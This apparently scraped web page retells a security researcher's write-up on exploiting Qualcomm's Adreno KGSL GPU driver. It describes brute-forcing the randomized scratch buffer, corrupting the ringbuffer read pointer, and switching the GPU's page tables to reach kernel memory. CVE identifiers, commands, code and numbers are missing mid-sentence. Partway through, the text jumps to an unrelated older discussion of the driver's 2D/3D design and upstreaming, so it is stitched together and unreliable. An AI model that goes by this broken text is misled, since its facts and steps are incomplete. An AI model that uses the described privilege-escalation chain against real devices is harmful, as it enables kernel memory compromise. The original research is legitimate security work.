What is kgsl
Select a random global GPU address for the "scratch" buffer that is used. But here we're talking about a GPU virtual address, not a kernel virtual address. That seems unusual, why would a GPU address need to be randomized? It was relatively straightforward to confirm that this commit was one of the security patches for CVE, which are linked in Qualcomm's advisory.
A related patch was also included for this CVE:. From d4ecadfa7ebb3c04cbec06b84b3 Mon Sep 17 Date: Mon, 9 Sep Execute user profiling in an indirect buffer. This ensures that addresses. And so the question becomes, why exactly is it important that user content doesn't end up on the ringbuffer, and is this patch really sufficient to prevent that?
And what happens if we can recover the base address of the scratch mapping? Both at least superficially looked to be possible, so this research project was off to a great start. Before we go any further, let's take a step back and describe some of the basic components involved here: GPU, ringbuffer, scratch mapping, and so on. Adreno Introduction.
These libraries implement a standard API for programming common GPU accelerated operations, such as texture mapping and running shaders. At a low level however, this functionality is implemented by interacting with the GPU device driver running in kernel space. The permissions are set by ueventd :. This means that the application can open the device file. The Adreno "KGSL" kernel device driver is then primarily invoked through a number of different ioctl calls e.
GPU Shared Mappings. For the most part, applications use shared mappings to load vertices, fragments, and shaders into the GPU and to receive computed results. That means certain physical memory pages are shared between a userland application and the GPU hardware.
The kernel driver will prepare a region of physical memory, and then map this memory into the GPU's address space for a particular GPU context, explained below. Finally, the application will map the shared memory into the userland address space by using an identifier returned from the allocation ioctl. At this point, there are two distinct views on the same pages of physical memory.
The first view is from the userland application, which uses a virtual address to access the memory that is mapped into its address space. This is similar to the address translation performed on the CPU, but with a completely different address space i. Each userland process has its own GPU context, meaning that while a certain application is running operations on the GPU, the GPU will only be able to access mappings that it shares with that process.
This is needed so that one application can't ask the GPU to read the shared mappings from another application. However certain mappings are used by all GPU contexts, and so can be present in every set of page tables.
They are called global shared mappings , and are used for a variety of system and debugging functions between the GPU and the KGSL kernel driver.
While they are never mapped directly into a userland application e. On a rooted Android device, we can dump the global mappings and their GPU virtual addresses using the follow command:. And suddenly our scratch buffer has appeared! To the left we see the GPU virtual addresses of each global mapping, then a size, and then the name of the allocation.
By rebooting the device several times and checking the layout, we can see that the scratch buffer is indeed randomized:. The same test reveals that the scratch buffer is the only global mapping that is randomized, all other global mappings have a fixed GPU address in the range [0xFC, 0xFD]. So we now know that the scratch buffer is correctly randomized at least to some extent , and that it is a global shared mapping present in every GPU context.
But what exactly is the scratch buffer used for? The Scratch Buffer. Diving in to the driver code, we can clearly see the scratch buffer being allocated in the driver's probe routines, meaning that the scratch buffer will be allocated when the device is first initialized:. We also find this useful comment:. This allows for some 'shared' data between. For example, it will be used by the GPU to write. The GPU address of a preemption restore buffer is dumped to the scratch memory, which appears to be used if a higher priority GPU command interrupts a lower priority command.
The read pointer RPTR of the ringbuffer RB is read from scratch memory and used when calculating the amount of free space in the ringbuffer. Here we can start to connect the dots. Firstly, we know that the patch for CVE included changes to both the scratch buffer and the ringbuffer handling code -- that suggests we should focus on the second use case above. Ringbuffer Basics. To understand what an invalid RPTR value might mean for a ringbuffer allocation, we first need to describe the ringbuffer itself.
The kernel driver will write commands into the ringbuffer, and the GPU will read commands from the ringbuffer. This occurs in a similar fashion to classical circular buffers.
At a low level, the ringbuffer is a global shared mapping with a fixed size of bytes. We can see the RPTR value being read at [1], and that it ultimately comes from a read of the scratch global shared mapping at [5]. The first comparison is for the case where the scratch RPTR is less than or equal to WPTR, meaning that there may be free space toward the end of the ringbuffer or at the beginning of the ringbuffer. So what happens if the scratch RPTR value is controlled by an attacker?
In that case, the attacker could make either one of these conditions succeed, even if there isn't actually space in the ringbuffer for the requested allocation size. For example, we can make the condition at [3] succeed when it normally wouldn't by artificially increasing the value of the scratch RPTR, which at [4] results in returning a portion of the ringbuffer that overlaps the correct RPTR location. That means that an attacker could overwrite ringbuffer commands that haven't yet been processed by the GPU with incoming GPU commands!
That sounds like it could be very useful! But how can we overwrite the scratch RPTR value? However we know that the scratch buffer is mapped into every GPU context, including any created by a malicious attacker. To achieve this, there are two fundamental steps.
Firstly, we need to confirm that the mapping is writable by user-supplied GPU commands. Secondly, we need a way to recover the base GPU address of the scratch mapping. This latter step is necessary due to the recent addition of GPU address randomization for the scratch mapping. So are all global shared mappings writable by the GPU? It turns out that not every global shared mapping can be written to by user-supplied GPU commands, but the scratch buffer can be.
We can confirm this by using the sysfs debugging method above to find the randomized base of the scratch mapping, and then writing a short sequence of GPU commands to write a value to the scratch mapping:. These operations aren't documented however, so behavior has to be inferred by reading the driver code and manual tests. It's also possible to confirm that the scratch buffer is writable by looking at how the page tables for the global shared mapping are set up in the kernel driver code.
But if the scratch buffer's base address is randomized, how do we know where to write to? There were two approaches to recovering the base address of the scratch buffer. The first approach is to simply take the GPU command we used above to confirm that the scratch buffer was writable, and turn it into a bruteforce attack.
Since we know that global shared mappings have a fixed range, and we know that only the scratch buffer is randomized, we have a very small search space to explore. Once the other static global shared mapping locations are removed from consideration, there are only possible locations for the scratch page.
On average, it took 7. The second approach was even better. As mentioned above, the scratch buffer is also used for preemption. Overwriting the Ringbuffer. Now that we know we can reliably control the scratch RPTR value, we can turn our attention to corrupting the contents of the ringbuffer.
What exactly is contained in the ringbuffer, and what does overwriting it buy us? There are actually four different ringbuffers, each used for different GPU priorities, but we only need one for this attack, so we choose the ringbuffer that gets used the least on a modern Android device in order to avoid any noise from other applications using the GPU ringbuffer 0, which at the time wasn't used at all by Android.
In practice however, user-supplied GPU commands are never placed directly onto the ringbuffer. This is for two reasons: 1 space in the ringbuffer is limited, and user-supplied GPU commands can be very large, and 2 the ringbuffer is readable by all GPU contexts, and so we want to ensure that one process can't read commands from a different process.
Instead, a layer of indirection occurs, and user-supplied GPU commands are run after an "indirect branch" from the ringbuffer occurs. Conceptually system level commands are executed straight from the ringbuffer, and user level commands are run after an indirect branch into GPU shared memory.
Once the user commands finish, control flow will return to the next ringbuffer operation. This operation takes two parameters, the GPU address of the branch target e. Aside from the indirect branch operation, the ringbuffer contains a number of other GPU command setup and teardown operations, something a bit like the prologue and epilogue of a compiled function.
This includes the preemption setup mentioned earlier, GPU context switches, hooks for performance monitoring, errata fixups, identifiers, and protected mode operations. When considering we have some sort of ringbuffer corruption primitive, protected mode operations certainly sound like a potential target area, so let's explore this further.
Protected Mode. This means that certain global shared mappings and certain GPU register ranges cannot be accessed read or written.
It turns out that this is critically important to the security model of the GPU architecture. Operations related to preemption, errata fixups, performance counters, and GPU context switches can all potentially run with protected mode disabled.
This last operation, GPU context switches, sounds particularly interesting. As a reminder, the GPU context switch occurs when two different processes are using the same ringbuffer. Since the GPU commands from one process aren't allowed to operate on the shared memory belonging to another process, the context switch is needed to switch out the page tables that the GPU has loaded.
What if we could make the GPU switch to an attacker controlled page table? Not only would our GPU commands be able to read and write shared mappings from other processes, we would be able to read and write to any physical address in memory, including kernel memory! This is an intriguing proposition, and looking at how the kernel driver sets up the context switch operations in the ringbuffer, it looks alluringly possible. It's possible that this design was chosen for performance considerations, as it means that the GPU can perform a context switch without having to interrupt the kernel and wait for the IOMMU to be reconfigured -- it can simply reconfigure itself.
That means if we can point TTBR0 to a set of malicious page tables, then we can translate any GPU address to any physical address of our choosing. And suddenly, we have a clear idea of how the original attack in CVE worked. Recall that aside from randomizing the scratch buffer location, the patch for CVE also "ensures that addresses and values specified directly from the user don't end up in the ringbuffer". We can now study Guang Gong's whitepaper and confirm that his attack managed to use the RPTR corruption technique at the time using the static address of the scratch buffer to smuggle operations into the ringbuffer via the arguments to performance profiling commands, which would then be executed due to clever alignment with the "true" RPTR value on the GPU.
Recovering the Attack. Since we have already bypassed the first part of the patch for CVE randomizing the scratch buffer base , to recover the attack i. In essence the second part of the patch for CVE prevented attacker-controlled commands from being written to the ringbuffer, particularly by the profiling subsystem.
The obvious path to bypassing this fix would be to find a different way to smuggle attacker-controlled commands. While there were some exciting looking avenues such as using the user-supplied GPU address as a command opcode , I decided to pursue a different approach. The 2D core is also a platform device with shared memory and a MM.
While the general interface is similar to the 3D core, the 2D GPU has its own separate pipeline and interrupt. PMEM is not ideal because the contiguous memory it uses needs to be carved out of bootmem at init time and is lost to the general system pool, so the driver was switched to use paged memory allocated via vmalloc and mapped into the GPU MMU. As a result, a handful of additional ioctls were put into the driver to support allocating and managing the memory.
Then, when support came along for the 2D core, it turned out that most of the support code was identical to that for the 3D GPU, with only a few differences in how the command streams and interrupts were processed. The 2D and 3D code were merged together to form the driver that I linked above. The ioctl calls remained the same, and a "device" member was added to each structure to determine which core the call was destined for. It has been argued that having the 2D and the 3D together is silly since they are separate platform devices and they should be treated as such - the proposal is to have multiple device nodes, one for each device.
I think that if we did this design we would also need to have an additional device to allocate memory buffers which will make it easier for us to share memory between cores X11 in particular does a lot of simultaneous 2D and 3D. I also think that the memory allocator should be transitioned to a standard design probably TTM.
I presume that one of the conditions of upstreaming would be to rename everything to something a little bit more descriptive and a little bit less cryptic.
0コメント